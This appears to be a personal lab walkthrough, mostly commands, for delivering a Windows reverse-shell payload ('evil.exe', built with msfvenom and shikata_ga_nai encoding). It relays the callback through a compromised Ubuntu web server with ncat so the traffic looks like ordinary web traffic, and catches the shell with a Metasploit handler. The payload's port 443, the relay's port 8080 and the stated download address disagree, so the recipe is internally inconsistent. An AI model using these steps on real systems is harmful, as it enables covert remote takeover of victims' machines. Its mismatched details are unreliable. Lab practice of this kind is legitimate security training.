-Environment setup:
Kali VM, Ubuntu VM, & Windows-10 VM (unpatched & all security off).

Kali-lab test:

    Kali-VM			             UbUntu-VM			   	  Windows10-VM
  My attack VM 			        compromised Web-Srvr		            <TARGET>
 _______________		          _______________		         _______________
|		|		         | <click-bait>	 |		        |		| 
|	        |		         |               |                	|               |
|		|		         |		 |		        |		|  
|   		|            		 |               |                      |     		|
|_______________|		         |_______________|		        |_______________|
   10.0.0.20			             10.0.0.30			     	    10.0.0.40                                             
  
- Using the scenario above (^), we will leverage a compromised web server (Ubuntu) to connect to the victim (Windows user).
- The end result lab scenario is shown below.

- Simulated:  A Windows-10 user (10.0.0.40) will go to the Ubuntu web server and download a malicious payload (evil.exe).  The malicious payload will call back to our Kali machine, THROUGH the Ubuntu web server.

-- we want the traffic to route back through the ubuntu server as to look like normal web traffic (port 8080).

<------------------------------------------------------------------------------------------------------------------------->

Step 1:
  #> (From: kali [msfconsole]--)
  #> msfvenom -p windows/shell/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=10.0.0.30 LPORT=443 > evil.exe

Step 2:
  #> From Ubuntu; host the malicious payload
  #> python3 -m http.server 8080

Step 3:
  #> From Ubuntu;
  #> ncat -vkl 8080 -c "ncat 10.0.0.20 4444"
	
Step 4:
  #> From: kali [msfconsole]--
   	#> use exploit/multi/handler
	#> set payload windows/shell/reverse_tcp
	#> set LHOST 10.0.0.20
	#> set LPORT 4444

Step 5:
  #> (simulate the windows user; download the .exe at 10.0.0.30:443 (evil.exe)
  #> run evil.exe
 
 - This should automatically connect you to the Win-10 client.
                               

    Kali-VM			             UbUntu-VM			   	  Windows10-VM
  My attack VM 			        compromised Web-Srvr		            <TARGET>
 _______________		          _______________		         _______________
|		|		         |  <evil.exe>	 |		        |		| 
|	       ------------------------ssh_>	        8080* <---10.0.0.30:8080 <-------browser|
|		|		         |		 |		        |  \ (download)	|  
|   	       4444<-------------------------------------443<--------------------< evil.exe	|
|_______________|		         |_______________|		        |_______________|
   10.0.0.20			             10.0.0.30			     	    10.0.0.40          
